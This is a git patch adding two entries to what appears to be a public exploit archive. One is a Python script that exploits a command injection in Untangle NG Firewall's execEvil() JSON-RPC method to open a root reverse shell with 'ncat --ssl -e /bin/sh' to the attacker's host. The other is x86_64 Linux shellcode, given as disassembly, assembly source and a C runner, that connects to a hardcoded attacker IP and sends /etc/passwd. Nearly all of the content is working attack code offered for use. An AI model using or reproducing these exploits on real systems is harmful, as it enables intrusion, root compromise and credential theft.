From 94e65060ade1e594fdbaa9d3cd45eccb714f1f3a Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Wed, 29 Jun 2016 05:06:40 +0000 Subject: [PATCH] DB: 2016-06-29 2 new exploits Linux x86_64 /etc/passwd File Sender Shellcode Untangle NGFW 12.1.0 beta - execEvil() Command Injection --- files.csv | 2 + platforms/json/webapps/40030.py | 75 +++++++++ platforms/lin_x86-64/shellcode/40029.c | 212 +++++++++++++++++++++++++ 3 files changed, 289 insertions(+) create mode 100755 platforms/json/webapps/40030.py create mode 100755 platforms/lin_x86-64/shellcode/40029.c diff --git a/files.csv b/files.csv index a7d2c6a32..b95c5ac5d 100755 --- a/files.csv +++ b/files.csv @@ -36202,3 +36202,5 @@ id,file,description,date,author,platform,type,port 40026,platforms/lin_x86/shellcode/40026.txt,"Linux x86 /bin/sh Shellcode + ASLR Bruteforce",2016-06-27,"Pawan Lal",lin_x86,shellcode,0 40027,platforms/php/webapps/40027.txt,"SugarCRM 6.5.18 - PHP Code Injection",2016-06-27,"Egidio Romano",php,webapps,80 40028,platforms/php/webapps/40028.txt,"Riverbed SteelCentral NetProfiler & NetExpress 10.8.7 - Multiple Vulnerabilities",2016-06-27,Security-Assessment.com,php,webapps,443 +40029,platforms/lin_x86-64/shellcode/40029.c,"Linux x86_64 /etc/passwd File Sender Shellcode",2016-06-28,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode,0 +40030,platforms/json/webapps/40030.py,"Untangle NGFW 12.1.0 beta - execEvil() Command Injection",2016-06-28,"Matt Bush",json,webapps,80 diff --git a/platforms/json/webapps/40030.py b/platforms/json/webapps/40030.py new file mode 100755 index 000000000..fcd1f00c6 --- /dev/null +++ b/platforms/json/webapps/40030.py @@ -0,0 +1,75 @@ +#!/usr/bin/python + +# Title: Untangle NGFW <= v12.1.0 beta execEvil() authenticated root CI exploit +# CVE: (Not yet assigned) +# Discovery: Matt Bush (@3xocyte) +# Exploit: Matt Bush +# Contact: mbush@themissinglink.com.au + +# Disclosure Timeline: +# 22/4/2016 Attempted to contact vendor after discovery of vulnerabilities +# 6/5/2016 No response from vendor, vulnerabilities reported to US-CERT (assigned VU#538103) +# 12/5/2016 US-CERT confirms contacting vendor +# 16/6/2016 US-CERT notifies of no response from vendor and suggests requesting CVE-ID following their timeline +# 27/6/2016 Public disclosure + +# A command injection vulnerability exists in Untangle NG Firewall, which allows non-root authenticated users to execute system commands with +# root privileges. This exploit has been tested on Untangle NG Firewall versions 11.2, 12, 12.0.1, and 12.1.0 beta, but should work on previous +# versions. The client-side sanitisation issues identified in the disclosure post can be exploited with a web app proxy. This exploit leverages +# the vulnerable function directly. Credentials can be obtained by sniffing unsecured HTTP logins (which the appliance defaults to). + +# The author is not responsible for how this script or any information within this script is used. Don't do anything stupid. + +import json, requests, sys + +if len(sys.argv) < 5: + print "[!] usage: " + sys.argv[0] + " " + print "[!] and in a separate terminal: 'ncat --ssl -nlvp 443'" + sys.exit() + +print "\nUntangle NGFW <= v12.0.1 execEvil() authenticated root CI exploit" +print " by @3xocyte\n" + +rhost = sys.argv[1] +lhost = sys.argv[2] +username = sys.argv[3] +password = sys.argv[4] + +login_url = "http://" + rhost + "/auth/login?url=/webui&realm=Administrator" +rpc_url = "http://" + rhost + "/webui/JSON-RPC" +auth = {'username': username, 'password': password} + +print "[*] Opening session..." +session = requests.Session() + +print "[*] Authenticating..." +try: + login = session.post(login_url, data=auth) + get_nonce = {"id":1,"nonce":"","method":"system.getNonce","params":[]} + req_nonce = session.post(rpc_url, data=json.dumps(get_nonce)) + data = json.loads(req_nonce.text) + nonce = data['result'] +except: + print "[!] Authentication failed. Quitting." + sys.exit() + +print "[*] Getting execManager objectID..." +try: + get_obj_id = {"id":2,"nonce":nonce,"method":"UvmContext.getWebuiStartupInfo","params":[]} + req_obj_id = session.post(rpc_url, data=json.dumps(get_obj_id)) + data = json.loads(req_obj_id.text) + object_id = data['result']['execManager']['objectID'] + +except: + print "[!] Could not get execManager objectID. Quitting." + sys.exit() + +print "[*] Exploiting Ung.Main.getExecManager().execEvil()..." +try: + exploit = {"id":3,"nonce":nonce,"method":".obj#" + str(object_id) + ".execEvil","params":["ncat --ssl -e /bin/sh " + lhost + " 443"]} + session.post(rpc_url, data=json.dumps(exploit)) +except: + print "[!] Exploit failed. Quitting." + sys.exit() + +print "[*] Exploit sent!" \ No newline at end of file diff --git a/platforms/lin_x86-64/shellcode/40029.c b/platforms/lin_x86-64/shellcode/40029.c new file mode 100755 index 000000000..42fd5c985 --- /dev/null +++ b/platforms/lin_x86-64/shellcode/40029.c @@ -0,0 +1,212 @@ +/* + # Title : Linux x86_64 /etc/passwd file sender shellcode + # Date : 28-06-2016 + # Author : Roziul Hasan Khan Shifat + # Tested On : Ubuntu 14.04 LTS x86_64 +*/ + + +/* + +Disassembly of section .text: + +0000000000400080 <_start>: + 400080: 48 31 c0 xor %rax,%rax + 400083: b0 39 mov $0x39,%al + 400085: 0f 05 syscall + 400087: 99 cltd + 400088: 48 39 d0 cmp %rdx,%rax + 40008b: 74 07 je 400094 + 40008d: 48 31 c0 xor %rax,%rax + 400090: b0 3c mov $0x3c,%al + 400092: 0f 05 syscall + +0000000000400094 : + 400094: b2 06 mov $0x6,%dl + 400096: 48 31 f6 xor %rsi,%rsi + 400099: 48 ff c6 inc %rsi + 40009c: 40 b7 02 mov $0x2,%dil + 40009f: 48 31 c0 xor %rax,%rax + 4000a2: b0 29 mov $0x29,%al + 4000a4: 0f 05 syscall + 4000a6: 4d 31 c0 xor %r8,%r8 + 4000a9: 49 89 c0 mov %rax,%r8 + 4000ac: 48 31 c0 xor %rax,%rax + 4000af: 99 cltd + 4000b0: 48 31 ff xor %rdi,%rdi + 4000b3: 48 31 f6 xor %rsi,%rsi + 4000b6: 50 push %rax + 4000b7: 50 push %rax + 4000b8: 50 push %rax + 4000b9: c6 04 24 02 movb $0x2,(%rsp) + 4000bd: 66 c7 44 24 02 05 c0 movw $0xc005,0x2(%rsp) + 4000c4: c7 44 24 04 c0 a8 56 movl $0x8056a8c0,0x4(%rsp) + 4000cb: 80 + 4000cc: 48 89 e6 mov %rsp,%rsi + 4000cf: b2 10 mov $0x10,%dl + 4000d1: 4c 89 c7 mov %r8,%rdi + +00000000004000d4 : + 4000d4: 48 31 c0 xor %rax,%rax + 4000d7: b0 2a mov $0x2a,%al + 4000d9: 0f 05 syscall + 4000db: 4d 31 c9 xor %r9,%r9 + 4000de: 4c 39 c8 cmp %r9,%rax + 4000e1: 75 f1 jne 4000d4 + 4000e3: 48 31 c0 xor %rax,%rax + 4000e6: 48 31 f6 xor %rsi,%rsi + 4000e9: 50 push %rax + 4000ea: 50 push %rax + 4000eb: 50 push %rax + 4000ec: c7 04 24 2f 65 74 63 movl $0x6374652f,(%rsp) + 4000f3: c7 44 24 04 2f 2f 70 movl $0x61702f2f,0x4(%rsp) + 4000fa: 61 + 4000fb: c7 44 24 08 73 73 77 movl $0x64777373,0x8(%rsp) + 400102: 64 + 400103: 48 89 e7 mov %rsp,%rdi + 400106: b0 02 mov $0x2,%al + 400108: 0f 05 syscall + 40010a: 48 89 c6 mov %rax,%rsi + 40010d: 4c 89 c7 mov %r8,%rdi + 400110: 99 cltd + 400111: 66 41 ba 88 13 mov $0x1388,%r10w + 400116: 48 31 c0 xor %rax,%rax + 400119: b0 28 mov $0x28,%al + 40011b: 0f 05 syscall + 40011d: 48 31 c0 xor %rax,%rax + 400120: b0 3c mov $0x3c,%al + 400122: 0f 05 syscall + +*/ + + +/* + +section .text + global _start +_start: + +xor rax,rax +mov al,57 +syscall + +cdq +cmp rax,rdx +jz send + +xor rax,rax +mov al,60 +syscall + +send: +;---------------- +;connecting to server +;------------------------- + +;creating socket + + +mov dl,6 +xor rsi,rsi +inc rsi +mov dil,2 + + +xor rax,rax +mov al,41 +syscall + +;--------------------- +xor r8,r8 +mov r8,rax ;socket descriptor + +;---------------------------- +;connecting............. + +;struct sockaddr_in 16 bytes +;sin_family 2 bytes +;sin_port 2 bytes +;sin_addr 4 bytes + + +xor rax,rax +cdq +xor rdi,rdi +xor rsi,rsi + + +push rax +push rax +push rax + +mov [rsp],byte 2 +mov [rsp+2],word 0xc005 ;port 1472 (change it if U want) +mov [rsp+4],dword 0x8056a8c0 ;change it to attacker IP + +mov rsi,rsp + +mov dl,16 + +mov rdi,r8 + +connect: +xor rax,rax +mov al,42 +syscall + +xor r9,r9 +cmp rax,r9 +jnz connect + +;------------------------------ +;opennig /etc/passwd + +xor rax,rax +xor rsi,rsi + +push rax +push rax +push rax + +mov [rsp],dword '/etc' +mov [rsp+4],dword '//pa' +mov [rsp+8],dword 'sswd' + +mov rdi,rsp + +mov al,2 +syscall +;---------------------- + + + +;sending............... +mov rsi,rax ;in_fd +mov rdi,r8 ;out_fd +cdq +mov r10w,5000 +xor rax,rax +mov al,40 +syscall +;-------------- + +;exiting + +xor rax,rax +mov al,60 +syscall + +*/ + + +#include +#include + +char shellcode[]="\x48\x31\xc0\xb0\x39\x0f\x05\x99\x48\x39\xd0\x74\x07\x48\x31\xc0\xb0\x3c\x0f\x05\xb2\x06\x48\x31\xf6\x48\xff\xc6\x40\xb7\x02\x48\x31\xc0\xb0\x29\x0f\x05\x4d\x31\xc0\x49\x89\xc0\x48\x31\xc0\x99\x48\x31\xff\x48\x31\xf6\x50\x50\x50\xc6\x04\x24\x02\x66\xc7\x44\x24\x02\x05\xc0\xc7\x44\x24\x04\xc0\xa8\x56\x80\x48\x89\xe6\xb2\x10\x4c\x89\xc7\x48\x31\xc0\xb0\x2a\x0f\x05\x4d\x31\xc9\x4c\x39\xc8\x75\xf1\x48\x31\xc0\x48\x31\xf6\x50\x50\x50\xc7\x04\x24\x2f\x65\x74\x63\xc7\x44\x24\x04\x2f\x2f\x70\x61\xc7\x44\x24\x08\x73\x73\x77\x64\x48\x89\xe7\xb0\x02\x0f\x05\x48\x89\xc6\x4c\x89\xc7\x99\x66\x41\xba\x88\x13\x48\x31\xc0\xb0\x28\x0f\x05\x48\x31\xc0\xb0\x3c\x0f\x05"; + +main() +{ +printf("shellcode length %ld\n",(long)strlen(shellcode)); +(* (int(*)()) shellcode) (); +} +